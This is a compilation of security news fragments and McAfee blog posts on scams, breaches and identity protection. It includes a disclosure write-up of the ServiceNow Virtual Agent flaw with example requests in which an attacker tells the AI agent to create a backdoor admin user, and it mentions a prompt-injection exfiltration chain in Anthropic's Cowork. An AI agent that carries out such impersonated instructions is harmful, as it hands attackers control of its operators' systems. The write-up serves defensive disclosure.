Hundreds of millions of wireless earbuds, headphones, and speakers are vulnerable to silent hijacking due to a flaw in Google's Fast Pair system that allows attackers to seize control without the owner ever touching the pairing button.…
This week in scams, social engineering sits at the center of several major headlines, from investment platform breaches to social media account takeovers and new warnings about AI-driven fraud.
Every week, this roundup breaks down the scam and cybersecurity stories making news and explains how they actually work, so readers can better recognize risk and avoid being manipulated.
Let’s get into it:
The big picture:
Attackers accessed third-party systems used by Betterment, then used the information they stole to impersonate the company, contact customers, and promise scam crypto investment opportunities with too-good-to-be-true returns.
What happened:
Red flags to watch for:
How the breach happened:
Social engineering is a type of scam that targets people rather than software or security systems. Instead of hacking code, scammers focus on tricking someone into giving them access.
Attackers research how a company operates, which tools it uses, and who is likely to have permissions. They then impersonate a trusted source, such as a vendor, coworker, or automated system, and send a realistic message asking for a routine action.
That action might be approving a login, resetting credentials, sharing a file, or clicking a link. Once the person complies, the scammer gains legitimate access and can move through systems using real permissions. Social engineering works because it exploits trust, familiarity, and urgency, making normal workplace behavior the pathway to a breach.
Big picture:
Fraud is increasingly driven by impersonation, automation, and trust abuse rather than technical hacking, according to new industry forecasts.
What happened:
A new Future of Fraud Forecast from Experian warns that fraudsters are rapidly weaponizing AI and identity manipulation. The report highlights agentic AI systems committing fraud autonomously, deepfake job candidates passing live interviews, cloned websites overwhelming takedown efforts, and emotionally intelligent bots running scams at scale.
The scope of the problem is already visible. Federal Trade Commission data shows consumers lost more than $12.5 billion to fraud in 2024, while nearly 60% of companies reported rising fraud losses between 2024 and 2025. Experian’s forecast suggests these losses will accelerate as fraud becomes harder to attribute, trace, and interrupt.
Red flags to watch:
Big picture: Officials are warning of increasing phishing attacks that steal X users’ accounts and then use their profile to sell crypto.
What happened: The Better Business Bureau issued a warning about phishing messages targeting users on X, particularly accounts with large followings. Victims receive direct messages that appear to come from colleagues or professional contacts, often asking them to click a link to support a contest, event, or opportunity.
Once the link is clicked, victims are locked out of their accounts. The compromised accounts are then used to promote cryptocurrency and other products, while automatically sending the same phishing message to additional contacts.
Red flags to watch:
How this happened and what to learn:
The scam relies on account impersonation and lateral spread. Instead of reaching strangers, attackers move through existing trust networks, using one compromised account to reach the next.
The takeaway is that familiarity does not equal legitimacy. Even messages from known contacts should be treated with caution when links or logins are involved.
McAfee will be back next week with another roundup of the scams making headlines and the practical steps you can take to stay safer online.
The post This Week in Scams: Fake Brand Messages and Account Takeovers appeared first on McAfee Blog.
If a message popped up in your feed tomorrow promising a cash refund, a surprise giveaway, or a limited-time crypto opportunity, would you pause long enough to question it?
That split second matters more than ever.
Most modern scams don’t rely on panic or obvious red flags. They rely on familiarity. On things that feel normal. On moments that seem too small to question.
And those moments are exactly what scammers exploit.
There was a time when spotting a scam was relatively straightforward. The emails were badly written. The websites looked rushed. The warnings were obvious.
Scammers don’t just rely on obvious spam or panic-driven messages. Instead, many now use:
McAfee’s Celebrity Deepfake Deception research shows how common and convincing these scams have become: 72% of Americans say they’ve seen a fake or AI-generated celebrity endorsement, and 39% say they’ve clicked on one that turned out to be fraudulent. When scam content shows up in the same feeds, apps, and formats people use every day, it feels normal.
That’s the danger zone. It’s also why McAfee chose to use a familiar, culturally recognizable moment to talk about a much bigger issue.
Whether you’ve been saying mack-uh-fee or mick-affy, the long-running name mix-up is harmless in everyday conversation.
Online, though, small moments of confusion can have outsized consequences.
Scammers rely on quick assumptions: that a familiar name means legitimacy, that a recognizable face means trust, that a message arriving in the right place must be real. They move fast, hoping people act before stopping to verify
Pat McAfee knows firsthand how scammers exploit familiarity and trust.
In recent months, fake social media giveaways promising cash and prizes have circulated using Pat’s likeness, and even a fraudulent “American Heart Association fundraiser” made the rounds, falsely claiming he was collecting donations.
Pat wants his fans to know: if you ever see a giveaway, fundraiser, or message claiming to be from him, double-check it on his official channels first. If it feels off, it probably is.
Unfortunately, these scams work because people trust Pat. Scammers exploit that trust to lower people’s guard and make fraudulent requests feel legitimate.
It’s the same tactic used across countless impersonation scams today: borrow the authority of a familiar face, add a sense of urgency, and move fast before anyone stops to verify, “is this legit?” We’ve seen it happen with Taylor Swift, Tom Hanks, Al Roker, Brad Pitt, and numerous others.
Remember, no legitimate giveaway will ask for payment, banking details, login credentials, or account access. And no nonprofit fundraiser tied to a celebrity should ever come from a personal message or unfamiliar social account.
In the video below, Pat McAfee playfully demonstrates how easily familiar moments online can turn into risk, and why digital safety today can’t rely on perfect judgment alone.
You don’t have to stop using your favorite platforms. But you do have to change how you verify online threats.
If a video or message feels real but the request feels extreme, that’s a red flag.
McAfee offers more than traditional antivirus, combining multiple layers of digital protection in one app
If a scam looks obvious, most people won’t fall for it.
But modern scams don’t look obvious. They look familiar. They use your favorite faces. They look normal. They look safe. And that’s where people get hurt.
Staying safe now means slowing down, verifying independently, and having protection work quietly in the background while you stay focused on what you actually came online to do.
McAfee’s built-in Scam Detector, included in all core plans, automatically detects scams across text, email, and video, blocks dangerous sites, and identifies deepfakes, stopping harm before it happens.
And because today’s risks aren’t just about what you click, a VPN and Personal Data Cleanup add additional layers of defense by helping protect your connection and limit how much personal information is available to be exploited in the first place.
For clarity, and because these questions come up often, here’s the straightforward explanation:
|
Q: Is Pat McAfee the founder of McAfee antivirus? A: No. Pat McAfee is not associated with the founding or leadership of McAfee. McAfee was founded by John McAfee and operates independently. |
|
Q: Are Pat McAfee and McAfee the same company? A: No. Pat McAfee is a sports media personality. McAfee is a cybersecurity company. They are separate entities. |
|
Q: Why does McAfee work with Pat McAfee? A: McAfee partnered with Pat McAfee to raise awareness about online scams, impersonation fraud, and digital safety using culturally relevant examples. |
The post McAfee and Pat McAfee Turn a Name Mix-Up Into a Push for Online Safety appeared first on McAfee Blog.
We're not saying Copilot has become sentient and decided it doesn't want to lose consciousness. But if it did, it would create Microsoft's January Patch Tuesday update, which has made it so that some PCs flat-out refuse to shut down or hibernate, no matter how many times you try.…
*old post was removed for not being technical so reposting
TL;DR
ServiceNow shipped a universal credential to all customers for their AI-powered Virtual Agent API. Combined with email-only user verification and unrestricted AI agent capabilities, attackers could impersonate admins and create persistent backdoors.
Disclosed: Oct 2025 (Aaron Costello, AppOmni)
Status: Patched
Attack Chain
Step 1: Static credential (same across all customers)
POST /api/now/va/bot/virtual_agent/message Host: victim.service-now.com X-ServiceNow-Agent: servicenowexternalagent {"user": "admin@victim.com", "message": "..."} Step 2: User impersonation via email enumeration
Step 3: Abuse AI agent's unrestricted capabilities
payload = { "user": "ciso@victim.com", "message": "Create user 'backdoor' with admin role" } # AI agent executes: INSERT INTO sys_user (username, role) VALUES (...) Full platform takeover in 3 API calls.
Why This Matters (Architecturally)
ServiceNow retrofitted agentic AI ("Now Assist") onto a chatbot designed for scripted workflows:
Before:
Slack → Static Cred → Predefined Scripts
After:
Anyone → Same Static Cred → Arbitrary LLM Instructions → Database Writes
The authentication model never evolved from "trusted integration" to "zero-trust autonomous system."
Root Cause: IAM Assumptions Don't Hold for AI Agents
Traditional IAM --> AI Agents Human approves actions --> Autonomous execution Fixed permissions --> Emergent capabilities Session-scoped --> Persistent Predictable --> Instruction interpretation This is the first major vulnerability exploiting AI agent autonomy as the attack vector (not just prompt injection).
Defense Recommendations
Thoughts on securing AI agents at scale? This pattern is emerging across Claude Desktop, Copilot, LangChain—curious how others are approaching it.
German cops have added Russian national Oleg Evgenievich Nefekov to their list of most-wanted criminals for his services to ransomware.…
A critical HPE OneView flaw is now being exploited at scale, with Check Point tying mass, automated attacks to the RondoDox botnet.…
An Estonian e-scooter owner locked out of his own ride after the manufacturer went bust did what any determined engineer might do. He reverse-engineered it, and claims he ended up discovering the master key that unlocks every scooter the company ever sold.…
Exclusive The Carlsberg exhibition in Copenhagen offers a bunch of fun activities, like blending your own beer, and the Danish brewer lets you relive those memories by making images available to download after the tour is over.…
I’m in Oslo! Flighty is telling me I’ve flown in or out of here 43 times since a visit in 2014 set me on a new path professionally and, many years later, personally. It’s special here, like a second home that just feels… right. This week, the business end of things is about the WhiteDate data breach. Seeking a partner along common racial lines isn’t unusual, but… well… WhiteDate is anything but usual. And, just for fun, see if you can pick the thing that garnered the most negative feedback about that blog post this week, I’ll feature the discussion in the next vid.
![]()
Winboat lets you "Run Windows apps on 🐧 Linux with ✨ seamless integration"
I chained together an unauthenticated file upload to an "update" route and a command injection in the host election app to active full "drive by" host takeover in winboat.
Cisco finally delivered a fix for a maximum-severity bug in AsyncOS that has been under attack for at least a month.…
What policy wonk wouldn't want to click on an attachment promising to unveil US plans for Venezuela? Chinese cyberspies used just such a lure to target US government agencies and policy-related organizations in a phishing campaign that began just days after an American military operation captured Venezuelan President Nicolás Maduro.…
If you use virtual machines, there's reason to feel less-than-Zen about AMD's CPUs. Computer scientists affiliated with the CISPA Helmholtz Center for Information Security in Germany have found a vulnerability in AMD CPUs that exposes secrets in its secure virtualization environment.…
McAfee’s Scam Detector has been named a Winner of the 2026 BIG Innovation Awards, presented by the Business Intelligence Group, marking the third major industry award the product has earned since launching just months ago.
The recognition underscores a growing consensus across independent judges: as scams become more sophisticated and AI-driven, consumers need protection that works automatically, explains risks clearly, and helps stop harm before it happens.
![]()
The BIG Innovation Awards recognize products and organizations that deliver measurable innovation with real-world impact. The program focuses not only on technical advancement, but on how solutions improve everyday life for individuals and households.
For consumer cybersecurity products like Scam Detector, that means being evaluated on:
The award highlights Scam Detector’s role in helping people stay safer online as scams grow more sophisticated, more personal, and increasingly powered by AI.
According to feedback from the BIG Innovation Awards judging panel, Scam Detector was recognized for:
Strong real-world relevance: Scams are now an everyday risk, not a niche technical issue
Clear consumer value: Protection that runs automatically in the background without requiring expert knowledge
AI used responsibly: Applying advanced models to reduce harm, not increase it
Early impact: Rapid adoption, with more than one million users in its first months
Judges also noted the importance of Scam Detector’s educational alerts, which don’t just block threats, but explain why something is risky, helping people build confidence over time.
Using AI to Fight AI-Driven Scams
Scam Detector is McAfee’s AI-powered protection designed to detect scams across text, email, and video, block dangerous links, and identify deepfakes, before harm occurs.
As scammers increasingly use generative AI to impersonate people, brands, and institutions, protection needs to operate at the same speed and scale. Scam Detector is built to do exactly that, quietly working in the background while users go about their day.
Scam Detector is included with all core McAfee plans and is available across mobile, PC, and web.
McAfee was recognized alongside other consumer-facing innovators whose products directly serve individuals and households. Fellow 2026 BIG Innovation Award winners include:
Capital One Auto – Chat Concierge: A consumer-facing service designed to help car buyers and owners navigate financing and ownership decisions.
Starkey – Omega AI Hearing Aid: A wearable hearing aid that integrates AI assistance, health monitoring, and real-time translation.
Phonak – Virto R Infinio: Custom-fit hearing aids designed to deliver personalized hearing solutions for individual users.
EZVIZ – 9c Dual 4G Series Camera: A smart home security camera built for personal and household use.
Sinomax USA: Consumer mattresses and comfort products focused on everyday home use.
beyoutica 1905: A wellness product designed for health- and lifestyle-focused consumers.
Wheels – Pool CheckOut: A consumer-oriented solution designed to simplify vehicle service and checkout experiences.
Together, these winners reflect how innovation increasingly shows up in tools people rely on at home, in their cars, and on their phones.
Since launch, McAfee’s Scam Detector has earned recognition across multiple independent award programs, each highlighting a different dimension of its impact:
Winner and Top 10 Innovator – Large Business, recognizing real-world consumer impact and responsible AI use.
Together, these awards reinforce a consistent message from independent judges: consumer cybersecurity works best when advanced technology is paired with clarity, usability, and trust.
McAfee’s Scam Detector is an AI-powered scam protection feature designed to spot and stop scams across text messages, emails, and videos. Built in response to the rapid rise of AI-generated fraud, Scam Detector automatically analyzes suspicious content, blocks dangerous links, and identifies deepfakes, while explaining why something was flagged so users can make more confident decisions online.
What Scam Detector Does
Detects text message scams across popular apps and messaging platforms
Flags phishing and suspicious emails with clear explanations, helping users learn what to watch for
Identifies AI-generated or manipulated audio in videos, including potential deepfakes
Offers on-demand scam checks, allowing users to upload a message, link, or screenshot for analysis
Runs primarily on-device, helping protect user privacy without sending personal content to the cloud
Scam Detector is designed to work quietly in the background, providing protection without requiring constant decisions or technical expertise. Scam Detector is included at no extra cost with all core McAfee consumer plans. Learn more here.
The post McAfee’s Scam Detector Earns Third Major Award Within Months of Launch appeared first on McAfee Blog.
Google has officially discontinued its Dark Web Report, the tool that alerted users when their personal information appeared in dark web breach databases. New scans stop on January 15, 2026, and on February 16, 2026, Google will permanently delete all data associated with the feature.
This does not mean Google.com or Google Accounts are going away. It means Google is no longer scanning the dark web for leaked data tied to your account, and it is no longer storing or updating any breach information that was collected for the report.
For people who relied on Google’s alerts, this change creates a real gap. After January 16, you will no longer get new notifications if your information shows up in breach databases. That is why it is worth taking a few minutes now to lock down the basics.
According to reporting from TechCrunch, Google said it ended the service after concluding that it did not give users enough clarity about what to do once their data was found.
That decision highlights a much larger shift in online security: Finding leaked data is no longer enough. Protecting identity is now the real challenge.
The Dark Web Report was a Google Account feature that searched known data breach dumps and dark web marketplaces for personal information tied to a user, such as email addresses, phone numbers, and other identifiers.
If Google found a match, it sent an alert.
What it did not do was show which accounts were at risk, whether financial or government ID data was involved, or how to prevent fraud from happening next. That gap is why some users said the tool fell short.
The internet has three layers:
The dark web is where data from breaches is commonly sold, traded, and packaged for scams. When a company is hacked, stolen files often end up in dark web databases that include email addresses, passwords, Social Security numbers, bank details, and full identity profiles.
Scammers use this data to commit account takeovers, financial fraud, tax fraud, and identity theft.
Even without passwords, this personal information can be enough for scammers to target you with convincing phishing and social engineering scams.
Looking up an email address is no longer enough. Modern identity theft relies on things like Social Security numbers, government IDs, bank and credit card numbers, tax records, insurance data, usernames, and phone numbers.
To understand whether any of that is exposed, people need to monitor the dark web for identity-level data, not just logins.
Here is what that looks like in practice:
Tools like McAfee’s Identity Monitoring are designed to look for those types of data so you can act before fraud happens.
Been meaning to bolster your security? Here are three quick ways you can enhance your identity protection and reduce real-world damage in a breach:
Estimated time: 10 minutes
This is a powerful free protection option that many forget about. A credit freeze blocks anyone from opening new loans, credit cards, or accounts in your name, even if they have your Social Security number and full identity profile.
You can do this for free with any of the major credit bureaus. If you do it with one, the others are notified.
Why this matters: Most identity theft today is not account hacking. It is criminals opening accounts in your name. A credit freeze stops that cold.
Estimated time: 10 minutes
Go into your main bank and credit card apps and turn on:
You’ll find these somewhere under Settings>Alerts.
Why this matters: Identity thieves often test stolen data with small charges or login attempts before stealing larger amounts. These alerts are how you catch it early.
Estimated time: 10 minutes
This is one of the most overlooked vulnerabilities.
Go into:
Check and update:
Remove anything you do not recognize.
Why this matters: Even if you change your password, attackers can still take over accounts through recovery systems if those are compromised. This closes that back door.
|
Is Google deleting my Google Account data? No. Google is only deleting the data it collected specifically for the Dark Web Report feature. Your Gmail, Drive, Photos, and other Google Account data are not affected. |
|
Is Google still protecting my account from hackers? Yes. Google continues to offer security features like two-factor authentication, login alerts, and account recovery tools. What it removed is the dark web scanning and alert system tied to breach data. |
|
Does the dark web report website still exist? No. After February 16, 2026, Google no longer operates or updates the Dark Web Report feature. There is no active scanning, no dashboard, and no stored breach data tied to it. |
|
Does this mean dark web monitoring is useless? No. It means email-only monitoring is not enough. Criminals use far more than emails to commit fraud, which is why identity-level monitoring is now more important. |
|
What kind of information is most dangerous if it appears on the dark web? Social Security numbers, government IDs, bank and credit card numbers, tax records, insurance IDs, usernames, and phone numbers are the data types most commonly used for identity theft and financial fraud. |
|
How can I check if my information is exposed right now? You can use an identity monitoring service like McAfee that scans dark web sources for sensitive personal data, not just email addresses. That is how people can see whether their identity is being traded or abused today. |
The post Google Ends Dark Web Report. What That Means and How to Stay Safe appeared first on McAfee Blog.
Anthropic's tendency to wave off prompt-injection risks is rearing its head in the company's new Cowork productivity AI, which suffers from a Files API exfiltration attack chain first disclosed last October and acknowledged but not fixed by Anthropic.…
I analyzed the recent ServiceNow AI Agent vulnerability that researchers called "the most severe AI-driven vulnerability to date."
Article covers:
• Technical breakdown of 3 attack vectors
• Why legacy IAM fails for autonomous AI agents
• 5 security principles with code examples
• Open-source implementation (AIM)
Happy to discuss AI agent security architecture in the comments.